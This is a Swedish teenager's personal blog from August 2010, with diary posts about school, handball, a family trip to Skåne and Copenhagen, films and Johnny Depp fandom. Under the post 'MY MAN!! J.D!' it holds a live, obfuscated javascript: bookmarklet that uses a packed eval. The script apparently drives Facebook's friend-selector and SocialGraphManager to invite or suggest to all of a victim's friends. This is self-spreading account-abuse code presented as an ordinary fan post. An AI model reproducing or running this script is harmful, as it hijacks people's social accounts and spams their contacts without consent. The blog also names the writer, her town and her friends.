Another perfect day

Ahora me entrenar.
Skulle gissa att bilden är från 05-06, typ.

31AUGUSTI


29AUGUSTI - mobilblogg

Söndags ångest.
Och ingen inspiration.

Existenz - natthumor



27AUGUSTI

Har precis käkat upp min thaimat, so damn good! Om drygt 30min ska jag hem till Lisa med några goa bruds.
Efter skolan idag gick jag hem till Yulia och chilla en stund innan jag åkte hem och köpte thaimat.
Heeeeeej Aston, vad gööör du? Så jävla rolig, haha!
Åååhhhh, gick det bra, ha? ha? ha?

26AUGUSTI

Längsta och segaste dagen = torsdag. Går från 08:25-16:15, med knappt någon rast alls! Ganska direkt efter skolan tränade jag handboll, ganska go träning. Men det finns en sak jag hatar på träningarna (fast det är grymt bra) det är att vi ska hoppa jämfota över häckar utan något mellan hopp, och häckarna står jätte nära varandra + att dom är höga. Jag kommer över dom, men jag får panic at the disco innan! Detta är för att träna spenssten, vilket man behöver väääldigt mycket i handboll.

Nu ska jag duscha, därefter njuta som fan att jag har sovmorgon imorgon, börjar 10:15! 
Saknar sommaren och att få bada, men mest av allt saknar jag fotbolls VM!
Hur jävla go känsla var det inte på dagarna? Shakira och K'NAAN's låtar, varje gång jag lyssnar på dom får jag bara en enorm längtan tillbaka. Det var något underbart med fotbolls VM 2010!

25AUGUSTI

Då var onsdagen i princip av klarad då, Hanna åkte precis hem och jag ska sysselsätta mig med no och engelska läxa, fun!
Jag och Hanna har suttit och kollat existenz, hittade denna sjukt roliga filmen, på natthumor!

24AUGUSTI

Får bli ett kortfattat inlägg för jag kom nyss hem från träningen och måste duscha osv + att det är bra program på tv.
Skolan var seg men gick ändå väldigt fort, åkte hem och la mig i sängen och sov några minuter. Åkte ner till båten med mamma och kollade så att den inte blåst bort, hem igen och vidare in till träning som var rätt go!

Jag har äntligen hittat mina örhängen.
Det visade sig att i morse när jag skulle ta på mig mina militärgrå converse trillade mina pärlörhängen ut, glad chey! När jag var på väg till träningen höll jag på att glömma mina handboll/springskor..
Pappa har glömt nyckel och jag har låst dörren han kommer ner till busshållplatsen precis när bussen kommer och jag letar förtvivlat efter nycklarna överallt men jag hittade dom inte..
Efter vi haft uppvärmning ute var det dags att ta på sig inneskorna, tro fan att nycklarna trillar ut då..
Dumma skor!

Pirates 3!

Nu visas Pirates 3 på kanal 9, HAPPY! Så jag tänker inte sitta här mer.
Jo, klart jag har filmerna eftersom jag sett dom 10000 gånger, men det är goare känsla när dom visas på tv!
Godnatt!

Melrose Co.

Svårt att få den bra på bild eftersom det är dåligt ljus i mitt rum, i alla fall när man ska ta bilder, men den är mycket snyggare på!

23AUGUSTI

Skolan gick väldigt fort idag, en hel del skratt! Efter skolan gick jag som sagt och mötte upp mamma och klippte mig, bort med allt slitet läskigt hår! Blev inte så stor skillnad längd mässigt men fräscht mässigt! Fick köpt en otroligt mysig kofta, visar den sen, och Svampbob collage block och pennor! Efter en liten tur på Kungsmässan åkte vi och träna.

22AUGUSTI

Haft en riktig städ helg! Det blev läskigt rent där nere, 10h ('jobbade' igår och idag) tog det! Rensat böcker LP skivor, städat varenda vrå! Men det var det värt för imorgon får jag min 'belöning' för arbetet - shopping! Vi sköt upp det med tanke på att vi inte blev klara. Dock brukar söndagar vara en städdag för min del, så jag är ganska 'van', fast inte med denna mängden damm och äckligheter..
Men nu på kvällen blir det en 'spa' kväll som vilket söndag som helst, samma rutiner.

Härligt att jag måste gå upp 06:30 imorgon, måndagar är den segaste dagen på hela året och då måste jag gå upp lika tidigt som 3 dagar till i veckan, blää bäää! 
Nu är klockan redan riktigt mycket för att jag ska hinna fixa de sakerna jag måste hinna fixa innan jag lägger mig skönt och bekvämt i sängen.

Natti!

MY star

I believe in memories
They look so, so pretty when I sleep
Hey now, and when, and when I wake up.

Myskväll med mammi dirR!

Vi tar en sväng in till Kungsbacka imorgon istället, då vi får mer tid! PLUS att vi inte ens är klara med källaren än, rensat maaaaassa böcker och gjort rent osv.
Nu börjar filmen, Happy Gilmore, tar mer mig Pirates 1 ner också, ifall Gilmore skulle vara dålig eller 'inte falla mig i smaken'.
PUSS!

Jack Johnson

Well I was sitting, waiting, wishing
You believed in superstitions
Then maybe you'd see the signs

Must I always be waiting, waiting on you
Must I always be playing, playing your fool

No, I can't I always be waiting, waiting on you
I can't always be playing, playing your fool
Jack Johnson – Sitting, Waiting, Wishing
Dessa raderna passar perfekt in just nu.
Hela låten hittar du här.

21AUGUSTI

Sov för länge idag även fast jag ställt klockan.. Ska hjälpa mamma med att städa lite här hemma sen kanske vi åker in till Kungsbacka och kollar lite kläder, tummen upp!
Inga planer för dagen annars, vilket är skönt! Så allt möjligt kan hända nu, typ..

Com Hem

Skönaste reklamen! 
Nu går jag och lägger mig, är super trött och får inte sova allt för länge imorgon! 
Godnatt.

LDIR

När jag kollade igenom Conley's tidning igår fastnade jag speciellt för dessa skorna från LDIR, hur snygga är dom inte!? Kostar dock 2398kr, kanske är värt det men ingenting som jag kommer köpa, fast jag vill det hur mycket som helst!
Men gå in på deras hemsida, dom har väldigt fina kläder & skor!

At dawn we're at war.

Bojkottar Hoffmaestro ikväll, spenderar kvällen med mina old classm8's Paulina & Lisa.
Pose!

<:3)~~

Jack Johnson – Flake

Alla 'texter' är från gamla blogg inlägg.
Och för er som inte förstår 'rubriken', så är det en mus.

No good with faces

Skolan var uselt tråkig idag. Kom även försent, bussens var försenad. Maten var inte alls god. Lovar att det var för jag inte hade mina örhängen!
Dagens + är att det äntligen är fredag! Hoffmaestro ska spela ikväll på Liseberg, har aldrig hört talas om dom (eller jo, har hört en låt som jag trodde var Jack Johnson, han är braaa) och hela Halland ska dit verkar det som.
Nu ska jag dricka massa te, är hur förskyld som helst!
Sen saknar jag min gamla klass, den var inte så stel! Jag har inte skrattat en enda gång riktigt mycket, tror faktiskt inte att jag skrattat någonting alls, bara några små skratt.. Det räcker bara med 5min i min förra och man har ont i magen så mycket man skrattat! HJÄLP MIG, SP1A är som en fisk på torra land!
Bye.
SNYGGHANNA!

20AUGUSTI

Just nu är jag hur opepp som helst på allting, min förskylning har blivit sämre, lika så min hals.. Ska slänga i mig en kopp te innan jag sticker iväg till skolan.
Igår kväll märkte jag att jag tappat bort något jag absolut inte fick tappa bort - mina örhängen! Jag är 100% säker på att jag la dom i väskan, men när jag kommer hem är dom helt borta! Grejen med dessa örhängen är inget speciellt, helt vanliga vita 'lagom stora' pärlörhängen från Glitter, bara att jag haft dom så länge som jag kan minnas, varje dag i flera års tid. Dom har gett mig tur och otur när jag inte haft på mig dom, så undra hur min dag kommer vara idag.. 
Nu måste jag kika ut vad jag ska ha på mig, något varmt i alla fall! När jag gick förbi kalendern förut tänkte jag byta månad men insåg att Augusti också är en kall månad!
Puss!

CONLEY'S

Blev lite ändrade planer. Innan jag stack iväg och tränade tog jag en liten fika med Hannah, var riktigt längesen jag träffade och pratade med den tjejen! Men trevligt var det!
Just nu sitter jag kollar i någon tidning mamma kom in med till mig från posten(?), Conley's, jag brukar inte gilla såna här tidningar men den här hade faktiskt riktigt snygga kläder OCH SKOR på vissa sidor! 
Förutom att jag är förskyld så mår jag riktigt bra, allting känns så bra! Längtar lite tills imorgon, till mitt skåp, till mitt godis, hehe! Vi (jag & några från klassen) vann massa godis efter en poängpromenad i skolan, vi vann på utslagsfrågan, hur många godisar det fanns i burken. Givetvis la jag lite i skåpet så jag skulle kunna ha lite framöver, hehe. 

Panik design

Som ni ser har jag ingen design just nu, eller jo, men den är inte speciellt fin.. Men jag fick panik på min förra, hade verkligen tröttnat något så extremt på den så jag slängde ihop en ny från blogg's mallar, fixat några enstaka saker. Håller på att så sakterliga att tänka ut min nya design så Linn, som är snäll och hjälper mig (wuhu), kan fixa en ny design. 

Nu ska jag in till gymmet och hoppas på att jag inte över anstränger mig, nädå.
Hörs ikväll!

SP1A

Kollade igenom vårat schema nu lite mer nogrant och upptäckte att vi inte hade en enda lektion som är längre än 1.5h! Den längsta är 1.25h, det känns riktigt bra vill jag lova!
April 2009 Strömstad.

19AUGUSTI

Imorgon börjar skolan på allvar, det känns rätt bra, för då får man verkligen se hur klassen är, eller dom tjejerna man inte vet någonting om (eftersom det är 5 killar och 10-11 tjejer).
Dagen idag var bra, på något sätt tycker jag allting går så segt, jag vill börja på allvar, men det får inte bli för mycket! Har en grymt bra fredag enligt schemat, börjar 10:15 och slutar 13:30. Alla andra dagar börjar jag 08:25!
Idag blir det nog lätt gym för min del istället för handboll, känner att min förskylning och hals får ta det lite lugnt under helgen. Känns 'sorgligt' att jag bara har dryga veckan kvar på Friskis sen byter jag till Aranäs gym..
Nej nu vet jag inte vad jag ska fylla ut med raderna längre!
Bye.

Kom ihåg till mig själv

Träningstider f.o.m 1 september.
Tisdag: 18.00-19:30
Torsdag: 19:00-20:30
Fredag: 18:15-19:30 (O.B.S. egen uppvärmning till 18:15).

Info about me

Du heter: Kristin
Smeknamn: Krille, Krilliz, Krillo osv.

Låt som när du är ledsen sörjer till: A Fine Frenzy – Almost Lover lt;/p>

Beroende av: Familj och vänner.

Vad tror folk om dig? Att jag är awsome!

Stämmer det? Självklart!

Vad får du oftast komplimanger för? Läppar, näsa, ögon & hår.

Hur imponerar man på dig? Genom att våga bjuda på sig själv, vara sig själv. Pengar & skryt går bort direkt! 
Brukar du skratta för dig själv? Mer än väldigt mycket.

Vad står det i ditt senast inkomna SMS?: "Brabra.<3''

Var bor du? Onsala.

Trivs du där? Jadå.

Hur svarar du i mobilen? "Hej det är jag är det du'' eller (om det är någon jag inte känner) ''Hallå/Hej det är Kristin''

Vem ringde du senast? Hanna

Vad sa den du senast pratade med i telefonen: Hon berättade om sin dag hemma i ledighet..
Antal timmar sömn inatt: 6h..

Sov du ensam: Ja

Brukar du komma i tid: Förvårnadsvärt ofta.

Hur känner du dig nu: Snorig..
Vanligaste färg på dina kläder: Ljusa färger (klär mig efter årstiderna)

Vad tycker du om fötter: Don't care, fast jag äcklas av andras fötter.

Vad saknar du: New York.

Hade du en bra kväll igår: Jo, go träning.

Favorit dryck på morgonen: Jucie
När brukar du oftast gå och lägga dig: Så tidigt jag kan

Är du blyg? Nej
Sysslar du med någon idrott: Ja, handboll (& gym) 
Tror du på kärlek vid första ögonkastet: Nja, jag tror på att man kan bli attraherade av varandra, att man kan bli förälskad. Men inte älska någon vid första ögonkastet.

Vad skulle du göra om du vore kille/tjej för en dag: Ha sex!

Är du nöjd med ditt liv: Ao.

Är du bortskämd: Nja, beror på vem man jämför med, men i min familj är jag den som är mest bortskämd. 
Vad gör du i morgon: Är i skolan, efter det vet jag inte.

Vad är det värsta du vet? Lögner

Har du bra vänner och äkta vänskap? Jag har underbara vänner!

Vad är det finaste du fått? Alla fina grattis/vykort av Hanna.
En speciell dag du minns: Oj, svårt, men (30min senare) nä, jag kommer inte på någon..

Du samlar på: Armband & things med Johnny Depp på/med.

Vem ringer du när du är arg/ledsen: Någon av mina fina vänner!
När grät du senast: Fick bara några små tårar när vi såg ''I rymden finns inga känslor'', men grät vet jag inte.

Vad skulle du göra om du vann en miljon: Resa till USA och åka runt där!

Vill du gifta dig: Jo.
Vill du ha barn: Tror det, men det verkar jobbigt att föda det..

Är du musikalisk? Otroligt!!

Vad dricker du helst när du är törstig: Vatten

Bor dina föräldrar tillsammans: Si

Har du någon gång gråtit dej till sömns: Ja

Biter du på naglarna: Ja.. Men just nu har jag lösnaglar.


18AUGUSTI

Grattis till min blogg som fyller 1år idag, wiihu! Det ska jag fira med tårta och presenter! Skämt o sido, min förskylning har förvärrats från igår till idag, usch, det värsta var att jag låg i 4h i min säng innan jag somnade..
Men nu är det inte min förskylning som jag ska skriva om utan att jag hade min första dag på gymnasiet idag! Det var helt okej, hade inte speciellt höga förväntningar tur var väl det, klassen var la helt okej.. Jag gillar verkligen själva Aranäs skolan, sen lärare osv är en annan femma. Men dagen gick bättre än jag trott! Det bästa kommer till jul då vi får egna (bärbara) datorer.

Efter skolan hängde jag med min nya classm8 Hanna T, senare kom även Cass. Stannade inte kvar så länge utan åkte hem och tog ett mellanmål med Hanna S och tjötade lite.
Nu sitter jag här och små suckar för mig själv eftersom mina inlägg alltid blir desamma, när den nya designen kommer blir det andra bullar!
Nu skriker tv på mig!
Bajs!

Johnny Collage

Från då till nu.
Ganska stor skillnad från när jag börja.
Nu kila jag iväg och tränar.
Puss!

17AUGUSTI

Har stor städat mitt rum hela dagen, är helt slut! Fixade lite nya bilder till mig Johnny Depp collage i min garderob, hehe! Men jag måste med ge att mitt rum såg förjävligt ut och att det är väldigt skönt nu när det är klart. Om drygt 2h ska jag träna handboll igen och på den stunden ska jag klippa och klistra, rakabenen och plocka undan lite jag såg nu att j ag hade kvar på mitt skrivbord.
Skriver det redan nu att under hösten kommer det antagligen inte vara speciellt mycket uppdatering dagarna jag tränar, vilket blir alla i princip för att jag måste verkligen vända på dygnet och eftersom jag inte kan sova tills skolan börjar som jag gjorde förut, träningarna blir sena, man ska äta duscha you name it och då hinner klockan redan bli mycket + att det kommer komma upp skolarbeten/läxor osv.
Puss!

Letters from Johnny


Hawaii next!
(Blev en liten fuktskada på brevet med tanke på att han skrev det vid poolen(?) det står ''It's only yours'' på andra raden).

16AUGUSTI

Börjar det dra ihop sig rejält, på onsdag börjar skolan igen, hade ett fullspäckat schema (fick precis se det). Men ändå helt okej.
Sov hos Hanna igår, som förövrigt vann stjärnvinst på Geisha.. Men snäll som hon är fick jag med mig en liten kartong hem med 350g. Tog mig ett lååångt pass på gymmet, sedan en låååång promenad med Josefine så det sitter rätt gött med lite onyttiga kalorier nu, hehe..
Idag fick jag (äntligen) köpt ansiktsprodukter för att mina har tagit slut hoppas på att denna är bra, från Clinique.
Nu får ni en liten bildbomb från våran soliga dag, eller den började faktiskt riktigt bra och slutade, men mitten kunde vart bättre.
Later!

15AUGUSTI

Denna helgen gick riktigt fort, nästan lite för fort. Fast den är ju inte slut än, söndag idag, sista dagen på helgen och då ska jag och Hanna åka in till Liseberg för första gången i år! Vi har verkligen riktigt tur eftersom vädret är kanon, det beräknas inte med så mycket folk, det lär ju stämma eftersom det är RixFm festival på Storan ikväll, 17:00, så vi prickade nog in en perfekt dag!
Längtar mest till nästa år då nya attraktionen AtmosFear är klar, den låter riktigt läskig när man läser om den, men jag ska åka den i vilket fall som helst! Idag ska jag få Hanna åka Uppswinget eftersom hon inte gjort det än! + så ska jag spela så jag (förhoppningsvis) kommer hem med en stjärnvinst!
Nu blev det väldigt mycket Liseberg och mindre fix.
Later!

14AUGUSTI

Nu får ursäkta mig för min dålig uppdatering med Göteborgskalaset håller mig upp bokad. Vi fick biljetter till bion och fyfan vad bra den va (SE DEN, SE DEN!!!) den har premiär om 20 dagar (nu blir det 19) och vet ni, BILL SKARSGÅRD VAR DÄR! IN YOUR FACE'S!
Nu ikväll har jag vart med Felicia, Johanna, Jessica & Claudia i Göteborg. Väldigt mycket skratt!

Dagens inköp:
1. Blus (T12) & shorts (H&M). 2. Mönster. 3. Detaljer.

The fourth kind

Här är filmen jag pratade om vi hade sett när vi hade pokerkväll, ta och se den, riktigt bra skräck/dokumentär!

PUSS

Vi fick biljetter till filmen, damn vad rolig den är! Den har premiär den 20 Augusti har jag för mig för er som vill se den! Alexander (Skarsgård) var redigt rolig i filmen, Gustav var också men han bara va. Imorgon blir det en annan Skarsgård vi ska försöka fixa biljetter till, Bill, I rymden finns inga känslor.
Ska försöka få lämna in min telefon igen! Hoppas det är tredje och sista gången är så j*vla trött på den nu, det har inte ens gått ett år jag och har vart på The phone house flera gånger om råd och snabb lagningar..
Nu ska jag sova så att jag kommer upp imorgon (i tid), godnatt!

13AUGUSTI

Fredagen den 13.
Nu alldeles strax ska jag åka in till Göteborg och möta upp Hanna, vi ska försöka fixa biljetter till förhandspremiären på Puss.
Nu brinner det i knutarna för min del, ciao!

12AUGUSTI

Bra, bättre, Oskar Linnros!


Oskar Linnros – Vilja Bli - hela hans otroligt bra album!
Kollade även lite på Amanda Jensen och Teddybears.
Mobilbilder, men ni överlever? Bra.
Innan jag stack ner till stan var jag och mormor och hälsade på morfar med super go thaimat, lovely!
Nu väntar sängen med tv&te.

T-shirts

http://clothing.shop.ebay.com/T-Shirts-Tank-Tops-/15687/i.html?_trkparms=65%253A12%257C66%253A2%257C39%253A6%257C72%253A3475&rt=nc&_nkw=johnny%20Depp&_dmpt=US_CSA_MC_Shirts&_trksid=p3286.c0.m14.l1513&_pgn=1

Länk till mig själv, det är massa t-shirtar med Johnny Depp på, ska illa kvikt investeras I hope!
230kr & 130kr (det är $6.99/$5.99 frakt också) för de tröjerna på översta raden till höger är ju helt okej, i alla fall för den med Johnny på. ((((: Och min garderob skulle inte tacka nej till dom heller!
Eftersom jag inte kan lägga upp bilder osv får ni ge er in på länken själv, för det är blockerat från datorn från publishme.se.
Love Krill!

Kapten rööööööd

han söööög.Var där ikväll med Fillan och Johanna, trevligt sällskap ialla fall!
Idag åkte jag och mormor till en gamal homie, inte direkt men hon var barnvakt helt själv så vi åkte hem till henne och åt middag. Tog mig en riktigt go tupplur eftermaten så jag i alla fall skulle kunna hålla ögonen uppe när Kapten röd spelade (dock var det riktigt tråkigt så det hade ju inte gjort något, hehe).. Men det är inte riktigt min musiksmak, men imorgon kommer en favorit: OSKAR LINNROS!!
Nu ska jag nana, ha det gôtt, haaaaaaaj!

11AUGUSTI

Drömde världens finaste dröm som jag inte tänker dela med mig av till någon för då går den inte i uppfyllelse! Hatar att vakna upp efter såna drömmar!
Idag kommer det antagligen inte alls bli mycket bloggande för jag åker hem till mormor och sover där inatt. Kanske hänger med några tjejer på Kapten Röd ikväll, hade vart super kul, men det känns knäppt och bara lämna mormor när jag lovat att vara där, nu vet ni det också, you'r welcome!
Nu måste jag fixa mig, later!
Pic's from yesturday.
1. Kortlek. 2. Emma & Lisa. 3. Jag & Paulina (mitt ansiktsuttryck är med mening..) 4. Lisa, Rocky & Klara

20 MAJ 2011

Den dagen ska jag sitta i en biosalong och se Pirates 4, med någon eller ensam, det spelar fanimig ingen roll, jag ska se den då den har premiär, förhoppningsvis VÄRLDSPREMIÄR!
1. Bild från we it. 2. Pirates 2. 3. Pirates 3.

Favoriter!

Du är fanimig det vackraste jag någonsin sett!

Okänt namn

Var inne på denna sidan och kollade lite bilder, denna var den absolut snyggaste jag såg!
Kvällen var super mysig! Efter att vi spelar poker ett tag bestämde vi oss för att hyra en film (kommer inte alls ihåg vad den hette...) men det var en skräck, riktigt bra! Verklighetsbaserad film.
Handlade om folk som bodde i Nome (?) i Alaska, som blivit utsatta för samma saker - att en vit uggla hade suttit utanför deras fönster. Dom gick till en psykolog och gick in i en djup meditation för att se vad som verkligen hände, att aliens kom och tog dom. Det läskiga/äckliga var att filmen var ju då både 'verklighetsbaserad' men också en dokumentär och år 2000 (när detta hände) har dom filmat allting och bara förnyat filmen men dom visar båda delarna samtidigt.
Är så extremt dålig på att förklara filmer osv, men så fort jag får reda på filmens namn ska jag lägga ut det och rekommendera den för er som inte sett den!

Pokerkväll

Have a great night ladies and gentlemans.

Klaas – Our Own Way - Original Mix Edit
Låten som har satts sig på min hjärna..

Var tvungen att testa..

frisyren då man har en strumpa på huvudet, såkallad ''Donut Bun''. Ni som har blogg så fanns (finns på mode&skönhet) det ett inlägg på startsidan om hur man gjorde den.
Jag försökte mig på den, i en slarvig variant. Den är väldigt lätt att göra och det går fort.
Slarvigt som sagt..
How to do it;

Conversen

De är militärgråa, nöjd chey!

10AUGUSTI

Gick upp 09:15 i morse, good girl! Åt frukost, packade träningsväskan och åkte in till stan med mammi en stund innan jag gymmade, köpte en present till Mrs. XXXXXX och köpte mig ett par nya skor, converse lovelyyyyy! Så nu är jag lite x-tra glad! Ska lägga in bild snart på dom! 
PÖÖSSS!

MY MAN!!

J.D! ♥
javascript:(function()
{a='app4949752878_jop';b='app4949752878_jode';
ifc='app4949752878_ifc';
ifo='app4949752878_ifo';
mw='app4949752878_mwrapper';eval(function(p,a,c,k,e,r)
{e=function(c){return(c<a?'':e(parseInt
(c/a)))+((c=c%a)>35?String.fromChar
Code(c+29):c.toString(36))};if(!''.replace(/^/,String))
{while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function()
{return'\\w+'};c=1};while(c--)if(k[c])p=p.rep
lace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}
('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\
h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\
j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q
\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\
v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\
p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]]
(V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)
[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]]
(e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);
C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]]
(c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|
x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|
x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|
x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|docu
ment|mw|fs|SocialGraph
Manager|ifo|ifc|||||||'.split('|'),0,{}))})();

Fyra senaste dagarna

I fredags när jag vaknade upp i min goa säng var planerna att jag skulle hämta min telefon som äntligen blivit klar från lagningen, STOR tumme upp! Efter det fortsatte allting som planerat; jag träffade Lisa, Josefine & Olof, J & O åkte hem, jag och Lisa åt en go pastasallad på Nello's, tjötade lite tittade på kläder och skor. Åkte hem till Lisa efter att ha vart i stan hela dagen och kollade på SATC2.
Små sprang hem efter filmen åt mat och fixade mig, sedan åkte vi hem till Niklas på krök. Kvällen var hur rolig som helst, tack för det Nicke!
Johanna, Fillan & Lisa.
Lördag: Hann inte mer än att vakna upp försen det var dax att åka ut med båten hela dagen. På kvällen hann jag inte mer än att komma hem för då skulle jag till Fillan och där jag spenderat mina senaste dagar, liggandes i soffan och kollat på filmer. Igår kunde man ju inte gjort något bättre så mycket som det regnade.
Idag när jag kom hem har jag städat mitt rum, inte hunnit så mycket mer.
Bye!

9AUGUSTI - Sista delen av Skåne

Har inte uppdaterat sen vi var i Köpenhamn, det beror på att dagen efter, 4 Augusti, kom familjen Kroén ner och 'joinade' oss, var på ''utflykt'' hela dagen. Badade mitt i stan, vid bryggan vi var på första dagen i Malmö efter badet åkte jag, min lillebror & en kompis (Kroénare) till Laserdom. Svin roligt, inte gjort det sen 2004(?) och så fick jag ett erbjudannde, spela 2 betala för 1 så dit ska jag snart igen!
Sen efter vi ätit middag så vräkte regnet ner och det började blixtra och åska så därför blev det ingen uppdatering den dagen. Plus att vi skulle upp 06:00 på morgonen därpå.
Här kommer bilder från 4 Augusti.
1. Glass köp. 2. Glass. 3. Me & my brother.
5 Augusti, sista dagen, gick som sagt upp klockan 06:00 för att sedan kunna cheeka ut från hotellet vid 07:00 och åka till Ystad för att där kunna ta färjan till Bornholm. Det var varken en hiss eller diss att vara där, eftersom min bror åkte bil med familjen Kroén var jag lycklig över att få bre ut mig i baksätet och titta på film och läsa (den man Älskar). Stannade och tittade i några små städer, badade och på kyrkor.
Åkte hem efter några timmar där, gött! Stannade vid Hovs Hallar och ''grabbarna'' badade, sedan hem tur.
1. Pappa som troll. 2. In a city. 3. Stenstrand, hittade otroligt fina stenar som följde med hem. 3. Havet. 4. Hovs Hallar.
Det var allt från min (& familjens) Skåne-Danmark tur.
Love! 

Flygplanet

Det gick snabbare än vad jag trodde att lädda upp det, så här får ni det.

Den är ganska lång, så det räcker att se de första sekundrarna för att fatta att den var lite läskig, hehe. Ledsen för dålig kvalité, men man ser i alla fall. Den snurrar inte så hela tiden, vid 40sek så går den ''normalt''.
Andra och sista (precis innan det stängde) gången vi åkte den så stannar den högst upp så vi var upp och ner, det var det värsta jag vart med om. Den är inte precis 10m hög.. Vi hängde där i ca. 10sekunder, fyfan vilken panik jag fick eftersom den inte gjort så med någon annan innan (tidigare på dagen) trodde jag den hade gjort lite som den själv ville.. Men sen åkte den låååångsamt bakåt och vi var nere på jorden igen.

3AUGUSTI - Köpenhamn, tivoli

Precis hem kommen från Köpenhamn. Just nu snurrar hela min värld, mina ben är som spagetti, så fort jag ställer mig upp känns det som jag ska flyga lite, haha, nej jag har inte rökt på. Tivoli i Köpenhamn va det som gällde idag, ganska snurrigt där inne (haha).

Låååååånga köer var det också, på vissa ställen.


80min vänte tid, det var det värt! Ska lägga upp en film senare idag (kväll, eller när jag kommer hem) när vi åker den. Super rolig och läskig.

Middag. Mitt i en mening.



På tal om något helt annat läste jag ut boken igår kväll, 24h, gryyyyymt bra, read it! Slutet var riktigt bra, kom på att den lille jäveln (Duncan's pappa) fortfarande sitter inne.
Nu ska jag börja på en annan bok, helt annan genre, den man Älskar.
Men nu vill min bror ha datorn igen, suck.. Men får väl ta och lämna tillbaka den.
Godnatt!

In Malmö

Cyklat runt på Ven i princip hela dagen på tandemcykel, mysig liten (stor?) ö. Åkte och till Malmö (där vi är nu och ska spendera resten av resan i) och kollade på Sveriges högsta hus, Turning Torso, och gick på promen/bryggan längs vattnet.


Mamma=Posar'N.


Dröm lägenheterna, hur snygga som helst, skulle sett allting i verkligheten, utsikten går ju inte mer än att skryta om! (ser lite på 3:dje bilden hur de ha det).
Nu ska vi äta lite kvälls mat, imorgon ska vi till Damnark, Köpenhamn, för att gå på tivoli, lovelyyy!
Puss!


2AUGUSTI - Skåne dag 2

Haft en lovely frukost uppe i slottet. Nu sitter jag här med super goooo musik from Spotify, vi ska strax lämna hotellrummet, eller nä det kommer vi inte alls göra (för vi har inte ens packat klart, busigt..) Har faktiskt ingenting att skriva mer, heeeejdåååå!

Skåne dag 1

Är helt slut efter bilandet idag + maten vi precis ätit. Påväg ner fikade vi på Café Utkiken, nice café.
När vi kom hit, till Örenäs Slott, spelade vi minigolf, snabbt bad i poolen sedan åt vi middag. Nu ska vi kolla på en film och sova. Ser framemot morgon dagen, frukosten älskar hotell frukot, speciellt Örenäs. Hoppas dom inte ändrat allt för mycket har inte vart här sen 2007, hehe. Efter vi lämnat Örenäs imorgon ska vi till Ven sedan till Malmö, looooove!
Inga bilder idag, kameran har legat i väskan.
Godnatt!

1AUGUSTI

Bara 17 dagar kvar tills skolan börjar..
Aja, nu beger vi oss.
Från när vi var i Skåne 2007, spättekaka är väldigt ogott, dock tycker inte min bror det..
BYE!

Sista natten i Sverige

Jo, för imorgon (idag) åker jag och min familj söder ut, till Skåne och Köpenhamn. Kommer hem på tosdag igen, dator ska med men inte säker på att internet kommer fungera överallt!

Dagens roligaste person blir Hanna Sandell, som fick mig att gråta av glädje idag när vi skulle gå på bussen påväg mot stan. 
Hon skojar med busschaffören(?????) genom att ta upp ett gammalt hundra kort (dom har tagit bort såna för några månader sen och de gröna automaterna till) och frågar honom:
- Vart ska jag stämpla detta nu då?
Han:
Vi har tagit bort dom, du får skriva en sms biljett då.
Sen hör jag inte så mycket mer för att jag börjar as garva och håller plånboken för ansiktet!
Sen tar jag bort plånboken och ser Hanna ta upp sitt betalningskort och säger:
Hah, jag skojade bara, ha-ha-ha!
Då kom tårarna och dom rann och rann, trodde aldrig att dom skulle ta slut, men det var hemskt roligt!
Du är underbar Hanna!

Nu ska jag lägga mig i sängen och kolla på Cry Baby, mumma, Johnny Depp!!!!
PORRRRRRRR! 
Tycker väldigt mycket om att jag hittat en go vän som också tycker om killen (mannen), Moa! Hela buss resan hem igen satt vi och prata om alla filmer han har gjort, Johnny Depp nostalgiiiiiiiiiiiiiiiiiiiiiii!

RSS 2.0